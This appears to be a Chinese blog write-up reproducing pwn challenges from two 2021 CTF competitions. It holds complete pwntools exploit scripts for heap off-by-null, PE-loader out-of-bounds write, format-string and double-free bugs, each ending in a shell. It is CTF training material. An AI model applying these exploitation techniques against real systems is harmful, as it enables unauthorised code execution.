津门杯2021CTF&红帽杯2021CTF pwn复现

最新推荐文章于 2024-01-16 21:45:00 发布
最新推荐文章于 2024-01-16 21:45:00 发布
阅读量684 收藏 1
点赞数
分类专栏: PWN CTF 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119938840
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

前言:这次的比赛时间重合了,刚了一下津门杯的一个pwn题,就没再看红帽杯的题了,tcl,因此这次复现是参考了nu1l的wp和白帽社区的wp,题的质量对于我这种菜鸟蛮高的

一、PwnCtfme 此题通过复现算是一个比较常规的堆题了,因为时间原因没看这道题,一个off-by-null,操作看exp吧,出自于nu1l wp

exp:

#coding:utf-8
from pwn import *
context(arch="amd64",os="linux",log_level="debug")
p=process('./pwn')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.sendlineafter('name:','CFM')
p.sendlineafter('password:','123456')
 
 
def add(name,size,des,score=None):
    p.sendline('1')
    p.sendafter('name:',name)
    p.sendlineafter("size",str(size))
    p.sendafter('des:',des)
    if score is not None:
        p.sendlineafter("score",str(score))
def dele(idx):
    p.sendlineafter('>>','2')
    p.sendlineafter('index:',str(idx))
def show(idx):
    p.sendlineafter('>>','3')
    p.sendlineafter('index:',str(idx))
 
# launch_gdb()
add('aaa',0xf8,'aaa',114514)
for _ in xrange(7):
    add('aaa',0xf8,'aaa',114514)
add('aaa',0xf8,'aaa',114514)
add('aaa',0x20,'aaa',114514)
for i in xrange(6):
    dele(7)
    add('aaa',0xf8,'a'*(0xf8-i),114514)
dele(7)
add('aaa',0xf8,'a'*0xf1 + '\x08',114514)
dele(7)                               //修改了presize位,前向合并
add('aaa',0xf8,'a'*0xf0,114514)
for i in xrange(1,8):
    dele(i)
dele(0)
dele(9)
dele(8)
for i in xrange(8):
    add('aaa',0xf8,'/bin/sh',321312)
show(6) 
p.recvuntil('des:')
leak_libc = u64(p.recv(6) + '\x00\x00') - 4111520
log.info('leak libc ' + hex(leak_libc))
dele(7)
dele(5)
add('aaa',0x118,'a'*0x100+p64(leak_libc+libc.sym['__free_hook']),11313)
add('aaa',0xf8,p64(leak_libc+libc.sym['system']),123121)
'''
0x4f365 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
 
0x4f3c2 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL
 
0x10a45c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
add('maxbos',0xf8,p64(leak_libc+0x4f3c2),2131)
dele(0)
p.interactive()

**二、pwnme 这道题,不想说啥,一部分考察了逆向分析,一部分是cve,还是刚出来的cve,卷了,卷了,越来越难了。。
在load的函数中的函数里有个**

for ( j = 0; j < v8; ++j )
  {
    dest = (*(a1 + 0x40) + v10[3]);
    memcpy(dest, (*(a1 + 0x30) + v10[5]), v10[4]);  //这里可以结合edit的任意写进行越界写
    sub_CFE(dest, v10[4], j);
    v10 += 10;
  }

这就是漏洞点,但是在利用这个之前,前面还要构造一下结构体,进行绕过,本来的我逆向分析就很菜,逆了一天,才逆明白,哎tcl,直接给出nu1l的exp吧
exp:

#coding:utf-8
from pwn import *
 
 
p=process('./loader')
libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
 
def load(idx,name,size,data):
    p.sendlineafter('>> ','1')
    p.sendlineafter('index: ',str(idx))
    p.sendlineafter('name: ',name)
    p.sendlineafter('size: ',str(size))
    p.sendlineafter('data: ',data)
def show(idx):
    p.sendlineafter('>> ','2')
    p.sendlineafter('index: ',str(idx))
 
def edit(idx,name,vaddr,size,data):
    p.sendlineafter('>> ','3')
    p.sendlineafter('index: ',str(idx))
    p.sendlineafter('name: ',name)
    p.sendlineafter('vaddr: ',str(vaddr))
    p.sendlineafter('size: ',str(size))
    p.sendlineafter('data: ',data)
def run(idx):
    p.sendlineafter('>> ','4')
    p.sendlineafter('index: ',str(idx))
def delete(idx):
    p.sendlineafter('>> ','5')
    p.sendlineafter('index: ',str(idx))
def gen_section_header(v_addr,size_of_raw_data,p_to_raw_data):
    s=b'a'*0xc+p32(v_addr)+p32(size_of_raw_data)+p32(p_to_raw_data)
    s=s.ljust(0x28,b'\x00')
    return s
def exploit():
    dos_header=b'MZ'.ljust(0x3c,b'\x00')+p32(0x40)
    secnumber=1
    fileheader=p16(0x14c)+p16(secnumber)
    fileheader=fileheader.ljust(0x14,b'\x00')
    pe_header=b'PE\x00\x00'+fileheader
    pe_header=pe_header.ljust(0xf8,b'\x00')
    payload=dos_header+pe_header
    payload+=gen_section_header(0,0,0)
    load(0,b'maxbos',len(payload),payload)
    load(1,b'maxbos',len(payload),payload)
    delete(1)
    pe_header=b'PE\x00\x00'+fileheader
    pe_header=pe_header.ljust(0xf8,b'\x00')
    payload=dos_header+pe_header
    payload+=gen_section_header(0x168,0,0)
    payload=payload.ljust(0x1f8,b'\x00')
    load(1,b'maxbos',len(payload+b'a'*0x10),payload+b'a'*0x10)
    delete(0)
    dos_header = b'MZ'.ljust(0x3c, b'\x00') + p32(0x40)
    secNumber = 2
    fileHeader = p16(0x14c) + p16(secNumber)
    fileHeader = fileHeader.ljust(0x14, b'\x00')
    pe_header = b'PE\x00\x00' + fileHeader
    pe_header = pe_header.ljust(0xf8, b'\x00')
    payload = dos_header + pe_header
    payload += gen_section_header(0, 0x188, 0)
    data = b'z'*0x1f0
    data = encrypt_data(data, 1)
    payload += gen_section_header(0, len(data), len(dos_header + pe_header) + 0x28*2)
    payload += data
    payload = payload.ljust(0x6f0, b'\x00')
    print (len(payload))
    load(0, b'plusls', len(payload), payload)
    run(1)
    p.recvuntil(b'z'*0x60)
    libc_base=u64(p.recvuntil(' is running',drop=True).ljust(8,b'\x00'))-0x3c4cd8
    print (hex(libc_base))
    load(2,b'ddd',0x18,b'a'*0x18)
    dos_header=b'MZ'.ljust(0x3c,b'\x00')+p32(0x40)
    secnumber=1
    fileheader=p16(0x14c)+p16(secnumber)
    fileheader=fileheader.ljust(0x14,b'\x00')
    pe_header=b'PE\x00\x00'+fileheader
    pe_header=pe_header.ljust(0xf8,b'\x00')
    payload=dos_header+pe_header
    payload+=gen_section_header(0,0,0)
    load(2,b'ff',len(payload),payload)
    load(3,b'fff',len(payload),payload)
    delete(3)
    pe_header=b'PE\x00\x00'+fileheader
    pe_header=pe_header.ljust(0xf8,b'\x00')
    payload=dos_header+pe_header
    payload+=gen_section_header(0x168,0,0)
    payload=payload.ljust(0x1f8,b'\x00')
    load(3,b'dd',len(payload+b'a'*0x10),payload+b'a'*0x10)
    delete(2)
    dos_header=b'MZ'.ljust(0x3c,b'\x00')+p32(0x40)
    secnumber=2
    fileheader=p16(0x14c)+p16(secnumber)
    fileheader=fileheader.ljust(0x14,b'\x00')
    pe_header=b'PE\x00\x00'+fileheader
    pe_header=pe_header.ljust(0xf8,b'\x00')
    payload=dos_header+pe_header
    payload+=gen_section_header(0,0x188,0)
    data=b'F'*0x190+b'q'*0x30+p64(libc_base+libc.sym['__free_hook']+0x8)+p64(0)+p64(libc_base+libc.sym['__free_hook'])+p64(0x1000)
    data=encrypt_data(data,1)
    payload+=gen_section_header(0,len(data),len(dos_header+pe_header)+0x28*2)
    payload+=data
    payload=payload.ljust(0x6f0,b'\x00')
    load(2,b'maosattack1',len(payload),payload)
    edit(3,b'maosattack2',0,0x10,p64(libc_base+libc.sym['system'])+b'/bin/sh\x00')
    gdb.attach(p)
    delete(3)
def encrypt_data(data,ch):
    ret=b''
    for i in range(len(data)):
        ret += p8(((data[i] - i) % 256) ^ ch ^ 0x39)
 
    return ret 
 
exploit()
 
p.interactive()

津门杯的题就复现到这吧,像n01是真的不会,连咋运行都不知道咋运行,等有时间再去询问一下大佬

**红帽杯就复现一道,parser
一、parser 这个道题是个格式化漏洞,在进行构建的时候,需要逆向分析一下进行构造参数,进行利用,这里泄露了堆基地址和stack返回地址,再进行预先泄露readgot表,然后进行fmt_payload的打返回地址为onegadget,两字节写入,short,即可,这里也参考一下白帽子的wp**
exp:

from pwn import *
 
 
context.log_level = True
context.arch = "amd64"
 
 
p = process("./chall")
 
 
gadget_addr = [0x4f365, 0x4f3c2, 0x10a45c]
 
 
p.recvuntil("> ")
payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n%15$p*%8$p*"
p.sendline(payload)
base_addr = int(p.recvuntil("*")[:-1], 16) - 0x14a8
stack_addr = int(p.recvuntil("*")[:-1], 16) + (0x7fffffffddd8 - 0x7fffffffd830)
log.info("base_addr: " + hex(base_addr))
log.info("stack_addr: " + hex(stack_addr))
print hex(base_addr+0x201F90)
p.recvuntil("> ")
payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n%22$saaaaa" + p64(base_addr + 0x201F90)
p.sendline(payload)
libc_base = u64(p.recv(6).ljust(8, b"\x00")) - 0x110180
log.info("libc_base: " + hex(libc_base))
gadget_addr = libc_base + 0x10a45c
log.info("gadget_addr: " + hex(gadget_addr))
 
gdb.attach(p)
 
p.recvuntil("> ")
payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n11" + fmtstr_payload(0x59, {stack_addr: gadget_addr}, 2, "short")
p.sendline(payload)
raw_input()
 
p.recvuntil("> ")
payload =b"getshell"
 
p.sendline(payload)
 
p.interactive()

二、manager一个用于二叉树的操作 多调试几遍就能看出来,参考于星盟的wp,自己懒得写了,红帽杯当时没参加

#coding:utf8
from pwn import *
#sh = process('./chall',env = {'LD_PRELOAD':'./libc-2.27.so'})
sh = remote('47.105.94.48',12243)
libc = ELF('./libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
#sh = process('./chall')
def add(key,size,content):
   sh.sendlineafter('>','1')
   sh.sendlineafter('key>',str(key))
   sh.sendlineafter('len>',str(size))
   sh.sendafter('content>',content)
def delete(key):
   sh.sendlineafter('>','2')
   sh.sendlineafter('key>',str(key))
def show():
   sh.sendlineafter('>','3')
add(10,0x500,'a'*0x40) #0
add(5,0x40,'b'*0x40) #1
add(4,0x40,'c'*0x40) #2
add(7,0x40,'d'*0x40) #3
add(6,0x40,'e'*0x40) #4
#delete(2)
#delete(5)
delete(10)
add(10,0x500,'a')
show()
sh.recvuntil('key:10 content:')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#double free
delete(5)
add(5,0x40,p64(free_hook_addr))
add(8,0x40,'/bin/sh\x00')
add(9,0x40,p64(system_addr))
#getshell
delete(8)
sh.interactive()

红帽杯由于附件不全原因先复现到这个题吧

总结:这次的津门杯题的质量虽然算难,但是能帮助我这种菜鸡能学到不少东西,红帽杯的话,当时没参加,两道题难度还算容易,就是一道vm题,我看大佬的vm复现,也没看懂,考察的是什么,真心不懂,。。,嘿嘿!!!。。

jsjsj11123
关注
专栏目录
攻防世界Pwn之1000levels
qq_42728977的博客
01-17 446
标题: MMA CTF 2nd 2016 : greeting-150 原理: 栈溢出,爆破system地址,绕过PIE保护。 做题环境: ubuntu14 64位 工具: pwntools、LibcSearcher 步骤: 根据程序逻辑爆破system地址,进而计算出libc_base,进而构造ROP链获得shell。 具体流程: 用checksec查看保护:发现有PIE保护,即地址无关可执行文...
2021年津门ctf线上赛记录(WICCTF)
lifanxin的博客
05-12 1998
津门ctf线上赛概述pwn题easypwnpwnCTFM总结 概述   本篇博客记录下自己的第一次ctf比赛经历,其实不完全是第一次,之前也参加过其他比赛,但只能做个签到就走了,这次不一样了,好歹做出了一道pwn题,有一道本来是有机会的,搞错libc了,线上没拿到flag,不过线上复现了下,感觉还行。因此特写下此篇博文,记录自己的一血。???? pwn题   我个人现在只会做做pwn题,后面打算也看看web,提升一下综合实力,这里介绍下比赛中的两道pwn题,和官方wp不一样,这里是我自己的思路。 easy
津门2021CTF pwn
qq_39948058的博客
08-26 544
前言:这个题一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,题很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道题,时间原因第二道pwn题也没看,噗。。 漏洞点: 漏洞点这两个地方,他们都是在bss段里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit R.
神来之笔,2021CTF内核漏洞精选解析
kali_Ma的博客
07-13 711
CTF解析0x0 保护0x1 源码分析0x2 漏洞点0x3 利用思路0x4 Exploit 0x0 保护 #!/bin/sh qemu-system-x86_64 \ -m 512M \ -kernel bzImage \ -nographic \ -smp 1 \ -cpu kvm64,+smep,+smap \ -append "console=ttyS0 quiet kaslr" \ -initrd rootfs.cpio \ -mo
WICCTF-2021-pwnCTFM
05-12
2021年津门ctf的pwn题。
中山市香山 2021 CTF zip
12-07
中山市香山 2021 CTF zip
深育 2021 高校组 CTF 网络安全大赛 专业竞赛 真题 zip
12-07
深育 2021 高校组 CTF 网络安全大赛 专业竞赛 真题
领航 CTF 2021 决赛 真题 7z
12-07
领航 CTF 2021 决赛
绿城 CTF 2021 真题 (1).rar
12-07
【绿城 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
2021CTF工业信息安全技能大赛(常州站)
08-03
2021CTF工业信息安全技能大赛(常州站)
WICCTF-2021-easypwn
05-12
2021津门ctf的第一道pwn题。
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
XCTF pwn部分解题记录
windy_ll的博客
02-13 3042
一、前言     闲来无事,刷刷ctf题(PS:傻逼CSDN,标题不能包含新手二字) 二、题目: level0     1、下载好题目后,拖入到kali中去,用file和checksec查看一下,可以发现该程序是64位,只开了NX保护,如下图所示:     2、拖入到IDA中去,发现在main函数中打印出信息后就调用了vulnerable_function函数,跟进vulnerable_function函数,可以发现read函数处为栈溢出漏洞,并且可以得知该buf数组距离ebp为0x80个字节,如下图所
津门wp
qq_53755216的博客
06-06 264
hate_php <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 一道命令执行题目
CTF刷题记录11.9WP_几道MISC题复现
weixin_40103894的博客
11-09 979
津门-m0_01 【键盘流量|云影密码(01248)】津门2021-m1 【StegSolve提取字符串】津门-tunnel 【DNS流量分析|文件提取|base64隐写】江苏工匠-来自银河的信号 【sstv慢速扫描|栅栏密码】
[ctf.show 元旦水友 2024] pwn复现
最新发布
weixin_52640415的博客
01-16 1260
rtld_global link_map setcontext+3d orw
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 2964
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存中由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存中分配,直到堆空间
格式化字符串漏洞
qq_52126646的博客
03-04 3677
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
[总结型]记CTF PWN中过气的堆利用
easy_level1的博客
04-15 1570
目录前言不再好用的unsorted bin attack不可能的tcache double free 前言 how2heap(https://github.com/shellphish/how2heap)可以说是目前"权威"的glibc中的heap exploitation techniques文档。在学术界近年的一些顶会文章也有引用这个github项目。 攻防对抗是一直持续发展的,很容易在学习中,复现一些过时的攻击技术出现困难,原因就是已经有补丁打上了。本文大致总结一些在比赛中常见的过时技术,持续更新…吧
2020祥云CTF挑战解析:进制翻转与图像恢复
"2020祥云网络安全竞赛的CTF(Capture The Flag)Write-up,高清PDF版本,包含了赛事中的各种挑战解决方案,主要涉及Miscellaneous(杂项)类问题,包括进制转换、音频处理、文件恢复等技术。" 在2020年的祥云...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值